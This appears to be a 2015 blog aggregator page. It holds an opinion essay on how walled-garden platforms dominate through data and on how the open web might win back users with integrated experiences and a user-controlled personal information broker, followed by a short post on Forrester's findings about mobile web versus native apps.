What makes this question difficult is that the walled gardens don't violate the promise of the web. In fact, we can credit them for amplifying the promise of the web. They have brought hundreds of millions of users online and enabled them to communicate and collaborate much more effectively. Google, Apple, Facebook and Twitter have a powerful democratizing effect by providing a forum for people to share information and collaborate; they have made a big impact on human rights and civil liberties. They should be applauded for that.

At the same time, their dominance is not without concerns. With over 1 billion users each, Google and Facebook are the platforms that the majority of people use to find their news and information. Apple has half a billion active iOS devices and is working hard to launch applications that keep users inside their walled garden. The two major concerns here are (1) control and (2) privacy.

First, there is the concern about control, especially at their scale. These organizations shape the news that most of the world sees. When too few organizations control the media and flow of information, we must be concerned. They are very secretive about their curation algorithms and have been criticized for inappropriate censoring of information.

Second, they record data about our behavior as we use their sites (and the sites their ad platforms serve), inferring information about our habits and personal characteristics, possibly including intimate details that we might prefer not to disclose. Every time Google, Facebook or Apple launch a new product or service, they are able to learn a bit more about everything we do and control a bit more of our lives and the information we consume. They know more about us than any other organization in history, and do not appear to be restricted by data protection laws. They won't stop until they know everything about us. If that makes you feel uncomfortable, it should. I hope that one day, the world will see this for what it is.

While the walled gardens have a positive and democratizing impact on the web, who is to say they'll always use our content and data responsibly? I'm sure that to most critical readers of this blog, the open web sounds much better. All things being equal, I'd prefer to use alternative technology that gives me precise control over what data is captured and how it is used.

Why are the walled gardens winning?

Why then are these walled gardens growing so fast? If the open web is theoretically better, why isn't it winning? These are important questions about the future of the open web, open source software, web standards and more. It is important to think about how we got to a point of walled garden dominance before we can figure out how an open web can win.

The biggest reason the walled gardens are winning is because they have a superior user experience, fueled by data and technical capabilities not easily available to their competitors (including the open web).

Unlike the open web, walled gardens collect data from users, often in exchange for free use of a service. For example, having access to our emails or calendars is incredibly important because it's where we plan and manage our lives. Controlling our smartphones (or any other connected devices such as cars or thermostats) provides not only location data, but also a view into our day-to-day lives. Here is a quick analysis of the types of data top walled gardens collect and what they are racing towards:

[Image: overview of the data collected by the major walled gardens]

On top of our personal information, these companies own large data sets ranging from traffic information to stock market information to social network data. They also possess the cloud infrastructure and computing power that enables them to plow through massive amounts of data and bring context to the web. It's not surprising that the combination of content plus data plus computing power enables these companies to build better user experiences. They leverage their data and technology to turn "dumb experiences" into smart experiences. Most users prefer smart contextual experiences because they simplify or automate mundane tasks.

[Image: technology and infrastructure owned by the major walled gardens]

Can the open web win?

I still believe in the promise of highly personalized, contextualized information delivered directly to individuals, because people ultimately want better, more convenient experiences. Walled gardens have a big advantage in delivering such experiences; however, I think the open web can build similar experiences. For the open web to win, we first must build websites and applications that exceed the user experience of Facebook, Apple, Google, etc. Second, we need to take back control of our data.

Take back control over the experience

The obvious way to build contextual experiences is by combining different systems that provide open APIs; e.g. we can integrate Drupal with a proprietary CRM and commerce platform to build smart shopping experiences. This is a positive because organizations can take control over the brand experience, the user experience and the information flow. At the same time, users don't have to trust a single organization with all of their data.

[Diagram: the current state of the open web]

The current state of the web: one end-user application made up of different platforms that each have their own user experience and presentation layer and store their own user data.

To deliver the best user experience, you want "loosely-coupled architectures with a highly integrated user experience": loosely-coupled architectures so you can build better user experiences by combining your systems of choice (e.g. integrate your favorite CMS with your favorite CRM with your favorite commerce platform), and highly integrated user experiences so you can build seamless experiences, not just for end-users but also for content creators and site builders. Today's open web is fragmented. Integrating two platforms often remains difficult and the user experience is "mostly disjointed" instead of "highly integrated". As our respective industries mature, we must focus our attention on integrating the user experience as well as the data that drives that user experience. The following "marketecture" illustrates that shift:

[Diagram: a shared integration and user experience layer]

Instead of each platform having its own user experience, we have a shared integration and presentation layer. The central integration layer serves to unify data coming from distinctly different systems. Compatible with the "Big Reverse of the Web" theory, the presentation layer is not limited to a traditional web browser but could include push technologies such as notifications.

For the time being, we have to integrate with the big walled gardens. They need access to great content for their users. In return, they will send users to our sites. Content management platforms like Drupal have a big role to play, by pushing content to these platforms. This strategy may sound counterintuitive to many, since it fuels the growth of walled gardens. But we can't afford to ignore ecosystems where the majority of users are spending their time.

Control personal data

At the same time, we have to worry about how to leverage people's data while protecting their privacy. Today, each of these systems or components contain user data. The commerce system might have data about past purchasing behavior, the content management system about who is reading what. Combining all the information we have about a user, across all the different touch-points and siloed data sources will be a big challenge. Organizations typically don't want to share user data with each other, nor do users want their data to be shared without their consent.

The best solution would be to create a "personal information broker" controlled by the user. By moving the data away from the applications to the user, the user can control what application gets access to what data, and how and when their data is shared. Applications have to ask the user permission to access their data, and the user explicitly grants access to none, some or all of the data that is requested. An application only gets access to the data that we want to share. Permissions only need to be granted once but can be revoked or set to expire automatically. The application can also ask for additional permissions at any time; each time the person is asked first, and has the ability to opt out. When users can manage their own data and the relationships they have with different applications, and by extension with the applications' organizations, they take control over their own privacy. The government has a big role to play here; privacy law could help accelerate the adoption of "personal information brokers".

[Diagram: a personal information broker under the user's control]

Instead of each platform having its own user data, we move the data away from the applications to the users, managed by a "personal information broker" under the user's control.

[Diagram: the personal information broker shared across applications]

The user's personal information broker manages data access to different applications.

Conclusion

People don't seem so concerned about their data being hosted with these walled gardens since they've willingly given it to date. For the time being, "free" and "convenient" will be hard to beat. However, my prediction is that these data privacy issues are going to come to a head in the next five to ten years, and lack of transparency will become unacceptable to people. The open web should focus on offering user experiences that exceed those provided by walled gardens, while giving users more control over their user data and privacy. When the open web wins through improved transparency, the closed platforms follow suit, at which point they'll no longer be closed platforms. The best case scenario is that we have it all: a better data-driven web experience that exists in service to people, not in the shadows.

23 Jun 2015 8:58am GMT

Frank Goossens: Mobile web vs. Native apps; Forrester’s take

So the web is going away, being replaced by apps? Forrester researched this and does not agree:

Based on this data and other findings in the new report, Forrester advises businesses to design their apps only for their best and most loyal or frequent customers - because those are the only ones who will bother to download, configure and use the application regularly. For instance, most retailers say their mobile web sales outweigh their app sales, the report says. Meanwhile, outside of these larger players, many customers will use mobile websites instead of a business' native app.

My biased interpretation: unless you think you can compete with Facebook for mobile users' attention, mobile apps should maybe not be your most important investment. Maybe PPK conceded victory too soon after all?


23 Jun 2015 7:45am GMT